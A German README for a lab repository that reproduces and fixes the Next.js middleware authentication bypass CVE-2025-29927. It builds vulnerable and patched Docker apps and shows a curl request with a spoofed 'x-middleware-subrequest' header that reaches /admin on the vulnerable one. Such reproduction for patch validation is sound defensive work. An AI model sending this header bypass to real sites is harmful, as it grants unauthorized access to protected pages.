
Reproduktion und Behebung der Schwachstelle CVE-2025-29927.
Reproduktion und Behebung der Sicherheitslücke CVE-2025-29927.
git clone [email protected]:Bongni/CVE-2025-29927.git
cd CVE-2025-29927
In vulnerable/ befindet sich eine Version der Anwendung, die anfällig für den Angriff ist. In fixed/ befindet sich eine Version der Anwendung, die auf die minimale Version aktualisiert wurde, die die Sicherheitslücke behebt.
⚠️ Wichtig: Diese Beispiele sind für Verteidiger, Forscher und Teams vorgesehen, die das Patchen validieren. Führen Sie diese Images nicht in öffentlichen oder Produktionsnetzwerken aus. Testen Sie nur auf Systemen, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Genehmigung haben.
Reproduktion der Sicherheitslücke CVE-2025-29927.
cd vulnerable/
docker build -t next-app-vuln .
docker run -p 3000:3000 next-app-vuln
Führen Sie diesen Befehl aus, der zur Anmeldeseite weiterleiten sollte
curl -i http://localhost:3000/admin
HTTP/1.1 307 Temporary Redirect
location: /login
Date: Wed, 08 Oct 2025 03:37:24 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Transfer-Encoding: chunked
Führen Sie dann diesen Befehl aus, der auf die Admin-Seite zugreifen können sollte
curl -i -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/admin
HTTP/1.1 200 OK
X-Powered-By: Next.js
ETag: "nr3m78x84avh"
Content-Type: text/html; charset=utf-8
Content-Length: 1133
Vary: Accept-Encoding
Date: Wed, 08 Oct 2025 22:54:39 GMT
Connection: keep-alive
Keep-Alive: timeout=5
...
Behebung der Sicherheitslücke CVE-2025-29927.
cd fixed/
docker build -t next-app-fixed .
docker run -p 3000:3000 next-app-fixed
Führen Sie diesen Befehl aus, der zur Anmeldeseite weiterleiten sollte
curl -i http://localhost:3000/admin
HTTP/1.1 307 Temporary Redirect
location: /login
Date: Wed, 08 Oct 2025 03:37:24 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Transfer-Encoding: chunked
Führen Sie dann diesen Befehl aus, der jetzt ebenfalls zur Anmeldeseite weiterleiten sollte
curl -i -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/admin
HTTP/1.1 307 Temporary Redirect
location: /login
Date: Wed, 08 Oct 2025 03:37:24 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Transfer-Encoding: chunked
Dieses Repository basiert auf l1uk/nextjs-middleware-exploit, wurde jedoch für Version 15.x von Next.js angepasst.